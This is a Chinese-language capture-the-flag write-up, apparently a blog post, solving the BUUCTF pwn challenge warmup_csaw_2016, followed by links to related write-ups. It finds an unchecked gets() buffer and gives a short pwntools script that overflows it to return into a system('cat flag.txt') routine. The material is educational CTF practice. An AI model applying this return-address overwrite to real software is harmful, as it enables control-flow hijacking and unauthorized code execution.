[BUUCTF-pwn]——warmup_csaw_2016
[BUUCTF-pwn]——warmup_csaw_2016
- 题目地址:https://buuoj.cn/challenges#warmup_csaw_2016
- 题目:
管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。
赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。
按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.txt。虽然没有 /bin/sh,可以获得权限。但是这个足够我们拿到flag了。
双击,发现在sub_40060D这个函数里面。
进这个函数看看,眼前一亮,就是我们想要的 system(“cat flag.txt”)
点击查看函数所在位置,发现0x400611是压参数的地方
。我们可以将其作为返回地址。
查看v5的位置,发现离返回地址的距离是0x40 + 8。
所以这道题的exploit为
from pwn import *
p = remote('ip地址',ip端口)
payload='a'*(0x40+8)+p64(0x400611)
p.sendline(payload)
p.interactive()
其实这道题和上一道题解法基本一样,感兴趣的也可以去看看
[BUUCTF-pwn]——warmup_csaw_2016相关推荐
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- buuctf pwn bjdctf_2020_babyrop
buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...
- 持续更新 BUUCTF——PWN(三)
文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...
- Buuctf(pwn) picoctf_2018_rop chain 栈溢出
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...
- BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...
- Buuctf(pwn) jarvisoj_tell_me_something 栈溢出
64位程序,开启了NX保护 400620 from pwn import *r=remote('node4.buuoj.cn',29273)flag_addr=0x400620payload='a'* ...
最新文章
- lr模型和dnn模型_建立ML或DNN模型的技巧
- LeetCode 272. 最接近的二叉搜索树值 II(栈+优先队列)
- 如何解决90%的问题?10位阿里大牛公布方法
- 联想万全t260磁盘阵列_联想万全T260G3服务器安装windows2008R2系统
- 【转载】动态载入DLL所需要的三个函数详解(LoadLibrary,GetProcAddress,FreeLibrary)...
- Oracle存在修改,不存在插入记录 SQL
- gitlab syntax highlighting theme
- Hibernate pojo对象的三种状态
- Word2010专项试题(1)
- 2019已经很冷,2020年Android工作或更难找——进大厂面试必备基础技能
- SSL证书的几个误解,正确认识SSL证书
- android ping网络连接服务器失败,Android 中网络连接检测和使用ping检测网络是否可访问...
- win10鼠标右键问题,导致桌面刷新重启,资源管理器explorer重启,文件夹闪退,应用管理员模式无法运行等等
- EDM营销进行消费场景布置的案例分享
- 点灯科技——小爱同学/RFID/四路继电器
- Android Studio使用Composing builds统一依赖管理
- [附源码]计算机毕业设计springboot贷款申请审核管理系统论文
- II——caffe+ubuntu14.04 64bit+cuda6.5配置说明——补充
- Oracle 生成流水号
- 将macbook内置键盘锁住,只使用外置键盘的方法